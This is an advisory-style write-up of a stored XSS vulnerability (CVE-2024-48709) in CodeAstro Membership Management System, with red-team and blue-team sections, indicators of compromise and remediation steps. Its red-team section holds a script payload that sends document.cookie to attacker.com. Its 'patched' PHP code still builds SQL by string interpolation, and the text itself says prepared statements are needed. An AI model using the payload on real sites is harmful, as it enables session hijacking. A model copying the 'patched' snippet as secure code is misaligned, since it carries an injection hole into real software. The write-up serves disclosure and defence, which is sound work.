CVE-2024-48709
Executive Summary
CVE-2024-48709 is a stored Cross-Site Scripting (XSS) vulnerability in CodeAstro Membership Management System v1.0. The flaw exists in the membershipType parameter of edit_type.php, allowing an authenticated attacker to inject arbitrary JavaScript into the application. When an administrator or other user views the affected page, the injected script executes in their browser, potentially leading to session hijacking, credential theft, or defacement. The vendor has not released a patch, and no official advisory exists. The EPSS score is 0.0%, indicating low exploitation likelihood in the wild, but the vulnerability is trivial to exploit and poses a significant risk to unpatched deployments.

Deep Dive & Mechanics
The vulnerability resides in edit_type.php, which is used to modify membership types. The membershipType parameter is taken directly from user input and reflected back into the HTML without proper sanitization or encoding. An attacker can inject a payload such as:
<script>alert('XSS')</script>
When the page is rendered, the script executes in the context of the victim's browser. Because the application does not implement Content Security Policy (CSP) or output encoding, any JavaScript payload will run. This is a classic stored XSS, as the malicious input is persisted in the database and served to all users who view the membership type list.
The application is built with PHP and likely uses MySQL. No CSRF tokens are present, making it possible to combine this XSS with other attacks.
Vulnerable vs. Patched Code
Vulnerable code snippet (edit_type.php):
<?php
$membershipType = $_POST['membershipType'];
// No sanitization or encoding
$query = "UPDATE membership_types SET type_name = '$membershipType' WHERE id = $id";
mysqli_query($conn, $query);
?>
Patched code (recommended):
<?php
$membershipType = htmlspecialchars($_POST['membershipType'], ENT_QUOTES, 'UTF-8');
$query = "UPDATE membership_types SET type_name = '$membershipType' WHERE id = $id";
mysqli_query($conn, $query);
?>
Additionally, a prepared statement should be used to prevent SQL injection, and a Content Security Policy header should be enforced.
Exploitation & Lab Setup
Red Team
- Setup: Deploy CodeAstro Membership Management System v1.0 on a local server (e.g., XAMPP).
- Authenticate: Log in with valid credentials (e.g., admin/admin).
- Craft Payload: Use a payload to steal cookies:
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script> - Inject: Navigate to
edit_type.php, enter the payload in themembershipTypefield, and submit. - Trigger: An administrator viewing the membership types list will have their cookies sent to the attacker's server.
Blue Team
- Monitor: Watch for unexpected outbound HTTP requests to unknown domains.
- Inspect: Review web server logs for suspicious
membershipTypevalues containing<script>tags. - Harden: Apply input validation and output encoding as shown in the patched code.
- Deploy WAF: Use a Web Application Firewall rule to block common XSS patterns.
Indicators of Compromise (IOCs)
- Network: HTTP requests to
edit_type.phpwithmembershipTypecontaining<script>oronerrorattributes. - Logs: Web server access logs showing
POST /edit_type.phpwith abnormalmembershipTypevalues. - File: Presence of unexpected JavaScript in the database
membership_typestable. - Behavior: Unusual outbound connections from the web server to external IPs on port 80/443.

Remediation & Mitigation
- Immediate: Disable the
edit_type.phpfunctionality if not required. - Code Fix: Apply output encoding using
htmlspecialchars()and use prepared statements for database queries. - WAF: Deploy a Web Application Firewall with rules to block XSS payloads.
- CSP: Implement a strict Content Security Policy header to prevent inline script execution.
- User Training: Educate administrators about the risks of clicking on untrusted links.
- Monitor: Continuously monitor logs for exploitation attempts.
